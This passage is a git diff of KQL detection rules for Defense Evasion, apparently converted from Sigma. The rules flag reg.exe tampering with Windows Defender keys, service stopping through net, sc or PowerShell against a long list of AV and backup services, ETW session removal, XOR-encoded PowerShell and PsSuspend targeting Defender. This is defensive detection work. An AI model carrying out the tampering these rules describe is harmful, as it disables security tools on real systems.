+// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql
index 534e2f08..dfd7e2e0 100644
--- a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE
-// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-03-22
-// Level: high
-// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Rare legitimate use by administrators to test software (should always be investigated)
-
-DeviceProcessEvents
+// Title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-22
+// Level: high
+// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Rare legitimate use by administrators to test software (should always be investigated)
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains 
"TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAccess" or ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableAntiVirusSignatures" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableCloudProtection" or ProcessCommandLine contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableNetworkProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "DisableSecurityCenter" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql index b3fcbcbd..9320a3fa 100644 --- a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql +++ b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql 
@@ -1,12 +1,12 @@
-// Title: Suspicious Windows Service Tampering
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems)
-// Date: 2022-09-01
-// Level: high
-// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001
-// False Positives:
-// - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry
-
-DeviceProcessEvents
+// Title: Suspicious Windows Service Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001
+// False Positives:
+// - Administrators or tools shutting down the services due to upgrade or removal purposes. 
If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "AdobeARMservice" or ProcessCommandLine contains "AHS Service" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "Apache4" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "AteraAgent" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "CASLicenceServer" or ProcessCommandLine contains "CASWebServer" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "dwmrcs" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains 
"EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "FontCache3.0.0.0" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "HostControllerService" or ProcessCommandLine contains "hvdsvc" or ProcessCommandLine contains "IAStorDataMgrSvc" or ProcessCommandLine contains "IBMHPS" or ProcessCommandLine contains "ibmspsvc" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "instance2" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "KeyIso" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or 
ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains "mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "mpssvc" or ProcessCommandLine contains "MSComplianceAudit" or ProcessCommandLine contains "MSDTC" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains "MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains "msftesql$PROD" or ProcessCommandLine contains "msftesql$SQLEXPRESS" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "NetPipeActivator" or ProcessCommandLine contains "netprofm" or ProcessCommandLine contains "NetTcpActivator" or ProcessCommandLine contains "NetTcpPortSharing" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "nvspwmi" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains 
"OracleDBConsole" or ProcessCommandLine contains "OracleMTSRecoveryService" or ProcessCommandLine contains "OracleOraDb11g_home1" or ProcessCommandLine contains "OracleService" or ProcessCommandLine contains "OracleVssWriter" or ProcessCommandLine contains "osppsvc" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "postgresql-x64-9.4" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains "ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "SearchExchangeTracing" or ProcessCommandLine contains "sense" or ProcessCommandLine contains "SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLANYs_Sage_FAS_Fixed_Assets" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or 
ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "storflt" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "sysmon" or ProcessCommandLine contains "TeamViewer" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Tomcat" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UFNet" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UniFi" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "vds" or ProcessCommandLine contains "Veeam" or ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "vmic" or ProcessCommandLine contains "VMTools" or ProcessCommandLine contains "vmvss" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine 
contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wmms" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WPFFontCache_v0400" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "wsbexchange" or ProcessCommandLine contains "WSearch" or ProcessCommandLine contains "wscsvc" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " delete " or ProcessCommandLine contains ".delete()" or ProcessCommandLine contains " pause " or ProcessCommandLine contains " stop " or ProcessCommandLine contains "Stop-Service " or ProcessCommandLine contains "Remove-Service ") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "start=disabled")) and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe", "PowerShell_ISE.EXE", "PowerShell.EXE", "psservice.exe", "pwsh.dll", "sc.exe", "wmic.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\PowerShell_ISE.EXE" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\wmic.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql
index 3ca2bf94..b43493dc 100644
--- a/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-02-11
-// Level: high
-// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001, attack.t1070.001
-// False Positives:
-// - Legitimate deactivation by administrative staff
-// - Installer tools that disable services, e.g. before log collection agent installation
-
-DeviceProcessEvents
+// Title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-11
+// Level: high
+// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001, attack.t1070.001
+// False Positives:
+// - Legitimate deactivation by administrative staff
+// - Installer tools that disable services, e.g. before log collection agent installation
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql
index cdc0a124..75bbb803 100644
--- a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql
+++ b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Windows Update Agent Empty Cmdline
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-26
-// Level: high
-// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Suspicious Windows Update Agent Empty Cmdline
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-26
+// Level: high
+// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql
index 41be0cce..6cffef56 100644
--- a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql
+++ b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Wordpad Outbound Connections
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-07-12
-// Level: medium
-// Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports.
-// This might indicate potential process injection activity from a beacon or similar mechanisms.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.command-and-control
-// False Positives:
-// - Other ports can be used, apply additional filters accordingly
-
-DeviceNetworkEvents
+// Title: Suspicious Wordpad Outbound Connections
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: medium
+// Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports.
+// This might indicate potential process injection activity from a beacon or similar mechanisms.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control
+// False Positives:
+// - Other ports can be used, apply additional filters accordingly
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\wordpad.exe" and (not((RemotePort in~ ("80", "139", "443", "445", "465", "587", "993", "995"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql b/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql
index 44ca426a..7981e74c 100644
--- a/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql
+++ b/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Workstation Locking via Rundll32
-// Author: frack113
-// Date: 2022-06-04
-// Level: medium
-// Description: Detects a suspicious call to the user32.dll function that locks the user workstation
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option
-
-DeviceProcessEvents
+// Title: Suspicious Workstation Locking via Rundll32
+// Author: frack113
+// Date: 2022-06-04
+// Level: medium
+// Description: Detects a suspicious call to the user32.dll function that locks the user workstation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql b/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql
index 5d55774c..f4de1526 100644
--- a/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql
+++ b/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious X509Enrollment - Process Creation
-// Author: frack113
-// Date: 2022-12-23
-// Level: medium
-// Description: Detect use of X509Enrollment
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1553.004
-// False Positives:
-// - Legitimate administrative script
-
-DeviceProcessEvents
+// Title: Suspicious X509Enrollment - Process Creation
+// Author: frack113
+// Date: 2022-12-23
+// Level: medium
+// Description: Detect use of X509Enrollment
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Legitimate administrative script
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql b/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql
index 2b07c6b5..c421d7f0 100644
--- a/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql
+++ b/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious XOR Encoded PowerShell Command
-// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
-// Date: 2018-09-05
-// Level: medium
-// Description: Detects presence of a potentially xor encoded powershell command
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027
-
-DeviceProcessEvents
+// Title: Suspicious XOR Encoded PowerShell Command
+// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
+// Date: 2018-09-05
+// Level: medium
+// Description: Detects presence of a potentially xor encoded powershell command
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql b/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql
index d379c122..40ece80f 100644
--- a/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql
+++ b/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql
@@ -1,12 +1,12 @@
-// Title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code
-// Author: frack113
-// Date: 2021-07-12
-// Level: medium
-// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - App-V clients
-
-DeviceProcessEvents
+// Title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code
+// Author: frack113
+// Date: 2021-07-12
+// Level: medium
+// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - App-V clients
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql b/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql
index 9810ca56..2086b083 100644
--- a/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql
+++ b/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql
@@ -1,10 +1,10 @@
-// Title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
-// Author: frack113
-// Date: 2021-07-16
-// Level: medium
-// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.t1216
-
-DeviceProcessEvents
+// Title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
+// Author: frack113
+// Date: 2021-07-16
+// Level: medium
+// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1216
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql b/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql
index 8e98a66b..6e39985e 100644
--- a/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql
+++ b/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql
@@ -1,12 +1,12 @@
-// Title: Sysinternals PsSuspend Suspicious Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-23
-// Level: high
-// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Sysinternals PsSuspend Suspicious Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-23
+// Level: high
+// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql
index 8ac7a924..b2e94c6a 100644
--- a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql
+++ b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql
@@ -1,13 +1,13 @@
-// Title: Syslog Clearing or Removal Via System Utilities
-// Author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
-// Date: 2021-10-15
-// Level: high
-// Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
